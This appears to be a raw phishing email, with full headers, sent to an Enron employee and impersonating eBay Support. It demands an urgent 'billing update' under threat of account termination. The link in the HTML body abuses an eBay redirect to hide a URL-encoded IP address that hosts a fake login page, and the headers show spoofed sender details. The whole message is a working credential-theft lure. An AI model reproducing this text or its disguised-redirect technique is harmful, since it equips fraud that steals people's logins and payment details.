Recieved: from nahou-mscnx06p.corp.enron.com ([192.168.110.237]) by NAHOU-MSMBX07V.corp.enron.com with Microsoft SMTPSVC(5.0.2195.2966);
	 Wed, 12 Sep 2001 21:10:30 -0800
Received: from corp.enron.com ([192.168.110.228]) by nahou-mscnx06p.corp.enron.com with Microsoft SMTPSVC(5.0.2195.2966);
	 Wed, 12 Sep 2001 23:09:14 -0600
Received: from mailman.enron.com (unverified) by corp.enron.com
 (Content Technologies SMTPRS 4.2.1) with ESMTP id <T5a0a048059c0a86ee241c@corp.enron.com> for <lgang@exchange.enron.com>;
 Wed, 12 Sep 2001 23:07:34 -0600
Received: from localhost.localdomain ([211.49.145.235])
        by mailman.enron.com (8.11.4/8.11.4/corp-1.06) with ESMTP id g343Bbl05696
        for <Lisa.Gang@enron.com>; Thu, 13 Sep 2001 00:05:36 -0500 (CDT)
Received: from ymbmmzp (9.103.51.222)
	by localhost.localdomain; Thu, 13 Sep 2001 14:12:50 +0900
Message-ID: <008001c47b77$a85e6f77$48b08e6a@ymbmmzp>
Reply-To: "eBay Support" <aw-cnfirm@ebay.com>
From: "eBay Support" <aw-confirm@ebay.com>
To: "eBay Customer" <Lisa.Gang@enron.com>
Subject: =?koi8-r?B?QWNjb3VudCBWZXJpZmljYXRp?=
	=?koi8-r?B?b24=?=
Date: Thu, 13 Sep 2001 14:12:50 +0900
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="----=_NextPart_000_0081_01C48E6A.48B06F77"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1158
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165

------=_NextPart_000_0081_01C48E6A.48B06F77
Content-Type: text/html;
        charset="koi8-r"
Content-Transfer-Encoding: quoted-printable

<HTML>=0D
<BODY>=0D
=0D
Dear eBay Community Member,<br><br>=0D
<!--n7A-->=0D
It has come to our attention that your eBay Billing Information records are=
 out of date.<br>=0D
That requires you to update the Billing Information If you could please tak=
e 5-10 minutes out of your online experience and update your<br>=0D
billing records, you will not run into any future problems with eBay's onli=
ne service.<br>=0D
However, failure to update your records will result in soon account termina=
tion. Once you have updated your account records, your eBay<br>=0D
session will not be interrupted and will continue as normal. Failure to upd=
ate will result in cancellation of service, Terms of Service<br>=0D
(TOS) violations or future billing problems.<br><br>=0D
=0D
To update and login to your eBay account, click on the link below:<br><br>=
=0D
<!--oVz-->=0D
<a href=3D"http://cgi4.ebay.com/ws/eBayISAPI.dll?MfcISAPICommand=3DRedirect=
ToDomain&DomainUrl=3Dhttp%3A%2F%2F%32%31%31%2E%31%37%32%2E%39%36%2E%37%2FUp=
dateCenter%2FLogin%2F%3FMfcISAPISession%3DAAJbaQqzeHAAeMWZlHhlWXS2AlBXVShqA=
hQRfhgTDrferHCURstpAisNRqAhQRfhgTDrferHCURstpAisNRpAisNRqAhQRfhgTDrferHCUQR=
fqzeHAAeMWZlHhlWXh">http://cgi4.ebay.com/ws/</a><br>=0D
=0D
<br>=0D
=0D
Thank you for using eBay!<br><br>=0D
=0D
**This is no-reply message. Please do not reply to this email, as you will =
receive no response**=0D
<!--zCl-->=0D
</BODY>=0D
</HTML>=0D

------=_NextPart_000_0081_01C48E6A.48B06F77--
